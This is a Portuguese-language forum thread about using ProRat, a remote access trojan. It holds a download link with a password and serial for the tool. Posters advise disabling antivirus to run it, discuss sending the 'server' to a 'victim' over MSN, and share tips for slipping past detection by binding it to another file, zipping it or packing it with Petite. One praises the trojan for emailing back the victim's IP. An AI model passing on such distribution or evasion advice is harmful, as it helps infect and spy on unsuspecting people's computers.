Aprenda usar o ProRat (super fácil)

Started by Anonymous, 21 de May , 2006, 11:08:49 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

BRUNA

http://rapidshare.com/files/27916975/ProRat_SE_Fx18.BRUNA.zip
Pass : oksa52wq
user: mohdjase1
serial: 66618e869accfc4f96

Anonymous

Quote from: "H??D H?X"Opa!
será que dava pra alguem me manda o ProRat por e-mail, pq eu baxei nesses dois links citados la em cima, mas parece que está corrompido... Quando eu executo o arquivo ProRat.exe, aparece uma mensagem do windows:
"O windows não pode acessar o dispositivo, caminho ou arquivo especificado. Talvez você não tenha as permissões adequadas para acessar este item".

Agradeço!

Cara eu usava o prorat mais ele e antigo e todos os avg pegam.
vc tem q desabilitar seu avg pra poder utilizar vei vlw!

Anonymous

E ai galera, tenho uma duvida sobre o prorat. quando mando o serv pelo msn aparece na tela da vitima uma mensagem e ele eh bloqueado, como posso fazer para ele passar indetectavel, ja ajuntei ele com outro arquivo, mas mesmo assim, se alguem puder responder, grato desde já.

lcs

Quote from: "calderoni"E ai galera, tenho uma duvida sobre o prorat. quando mando o serv pelo msn aparece na tela da vitima uma mensagem e ele eh bloqueado, como posso fazer para ele passar indetectavel, ja ajuntei ele com outro arquivo, mas mesmo assim, se alguem puder responder, grato desde já.
Isso acontece pois o MSN não permite que seja enviado arquivos do tipo executavel, e o Pro rata so serve mesmo para estudo e talves um auxilio remoto, pois todos os Av´s ja pegam.
Pra que viver sem sentido.

Ch1p5

Quote from: "calderoni"E ai galera, tenho uma duvida sobre o prorat. quando mando o serv pelo msn aparece na tela da vitima uma mensagem e ele eh bloqueado, como posso fazer para ele passar indetectavel, ja ajuntei ele com outro arquivo, mas mesmo assim, se alguem puder responder, grato desde já.
como o lcs disse... o MSN não envia arquivos executáveis...
mas pra resolver o problema... é só zipar ele
flws

"Minha impressora está normal, mas não imprime"

Anonymous

Muito grato por responder; Tentei usar o petite, mas ele dá um erro e naum  comprime, o que posso fazer nesse caso?

caesar2k

só não consigo entender porque o hype em cima do Pro RAT é tão grande O_O
É um sub7 com skins xD

Anonymous

Gostei desse trojan, (principalmente pela a opção de manda pro e-mail o ip  ;D